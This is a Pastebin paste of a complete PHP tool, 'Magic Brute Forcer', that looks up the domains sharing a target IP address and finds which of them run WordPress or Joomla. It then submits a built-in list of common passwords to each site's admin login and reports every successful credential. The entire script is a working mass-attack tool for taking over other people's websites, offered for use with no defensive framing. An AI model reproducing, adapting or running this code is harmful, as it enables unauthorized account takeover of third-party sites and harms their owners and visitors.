Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- ini_set("display_errors", "0");
- set_time_limit(0);
- echo'<html>';
- echo'<title>Magic Brute Forcer BY Team-ECF</title>';
- echo"<body bgcolor='black'>";
- echo'<center>';
- echo"<font color='red' face='courier new'>";
- echo'<h1><b>[Magic Brute Forcer]</b></h1>';
- echo'<FORM action="" method="post">';
- echo'<input type="hidden" name="form_action" value="1">';
- echo'<table border=1>';
- echo'<tr><td><font color="green" face="courier new">Target IP</font></td><td><input type="text" size="60" style="background-color: black; color: red; font-size: 15px; font-family: courier new;" name="url" value=""></td></tr>';
- echo'</table>';
- echo"<br>";
- echo'<INPUT class=submit type="submit" value="[SUBMIT]" style="background-color: black; color: blue; font-size: 20px; font-family: courier new; name="Submit">';
- echo'</FORM>';
- echo'</font>';
- echo'</center>';
- echo'</body>';
- echo'</html>';
- if (array_key_exists('form_action', $_POST)){
- echo ("<br>") ;
- $site=$_POST['url'];
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $sameip=('http://bgp.he.net/ip/'.$site.'#_dns');
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $sameip);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- $revip = curl_exec($ch);
- //The following A records are set to
- $pos = strpos($revip,'The following A records are set to ');
- if ($pos===false){
- }
- else {
- $list1=explode('The following A records are set to',$revip);
- $list=explode('title',$list1[1]);
- $count=count($list);
- $i='1';
- echo ("<center><table border=1 cellspacing=1 cellpading=1>
- <tr><th width='400'><font color='red' face='courier new'>SITE NAME</font>
- </th><th width=200><font color='red' face='courier new'>CMS</font></th>
- <th width=150><font color='red' face='courier new'>USERNAME</font></td>
- <th width=150><font color='red' face='courier new'>PASSWORD</font></td>
- <th width=100><font color='red' face='courier new'>STATUS</font></td></tr>");
- for ($i=1 ; $i <= ($count) ; $i++) {
- $domain=entre2v2($list[$i],'="','">');
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $urltowp='http://'.$domain.'/wp-login.php';
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urltowp);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,'<body class="login">');
- if ($pos === false){
- $urltowp='http://'.$domain.'/administrator/';
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urltowp);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,'Joomla!');
- if ($pos===false){
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width='400'><font color='white' face='courier new' > $domain </font></td>
- <td width=200><font color='white' face='courier new' > OTHER </font></td>
- <td width=150><font color='white' face='courier new'> ----------<font></td>
- <td width=150><font color='white' face='courier new'> ----------</font></td>
- <td width=100><font color='white' face='courier new'> CANCELLED </font>
- </td></tr></table></center>";
- }
- else {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width='400'><font color='yellow' face='courier new' > $domain </font></td>
- <td width=200><font color='yellow' face='courier new' > JOOMLA </font></td>
- <td width=150><font color='yellow' face='courier new'> ------------<font></td>
- <td width=150><font color='yellow' face='courier new'> ------------</font></td>
- <td width=100><font color='yellow' face='courier new'> RUNNING </font>
- </td></tr></table></center>";
- $a=('admin admin123 123456 12345 12345678 pass 123456789 password admin_123 123@123 1');
- $passwords=explode(" ",$a);
- $co=randomt();
- //joomla part
- foreach ( $passwords as $password) {
- $urlto='http://'.$domain.'/administrator';
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=".$password."&option=com_login&task=login&return=".$return."&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- }
- else {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width='400'><font color='green' face='courier new' > $domain </font></td>
- <td width=200><font color='green' face='courier new' > JOOMLA </font></td>
- <td width=150><font color='green' face='courier new'> administrator<font></td>
- <td width=150><font color='green' face='courier new'> $password</font></td>
- <td width=100><font color='white' face='courier new' style='background-color: green;'> SUCCESS </font>
- </td></tr></table></center>";
- }
- }
- }
- }
- else {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width='400'><font color='blue' face='courier new' > $domain </font></td>
- <td width=200><font color='blue' face='courier new' > WORDPRESS </font></td>
- <td width=150><font color='blue' face='courier new'> ------------<font></td>
- <td width=150><font color='blue' face='courier new'> ------------</font></td>
- <td width=100><font color='blue' face='courier new'> RUNNING </font>
- </td></tr></table></center>";
- $a=('admin admin123 123456 12345 12345678 pass 123456789 password admin_123 123@123 1');
- $passwords=explode(" ",$a);
- foreach ( $passwords as $password) {
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $url2=$urltowp;
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urltowp);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&rememberme=forever&wp-submit=Log In&testcookie=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos=strpos($buffer,'theme-editor.php');
- if ($pos === false){
- }
- else {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width='400'><font color='green' face='courier new' > $domain </font></td>
- <td width=200><font color='green' face='courier new' > WORDPRESS </font></td>
- <td width=150><font color='green' face='courier new'> admin<font></td>
- <td width=150><font color='green' face='courier new'> $password</font></td>
- <td width=100><font color='white' face='courier new' style='background-color: green;'> SUCCESS </font>
- </td></tr></table></center>";
- }
- }
- }
- }
- }
- }
- echo'<center>';
- echo"<font face='courier new' color='red'>";
- echo'<h2>[coded by Legion Hunter]</h2>';
- echo'<h4>[nadimzobaer@gmail.com]</h4>';
- echo'</font>';
- echo'</center>';
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- function randomt() {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double)microtime()*1000000);
- $i = 0;
- $pass = '' ;
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement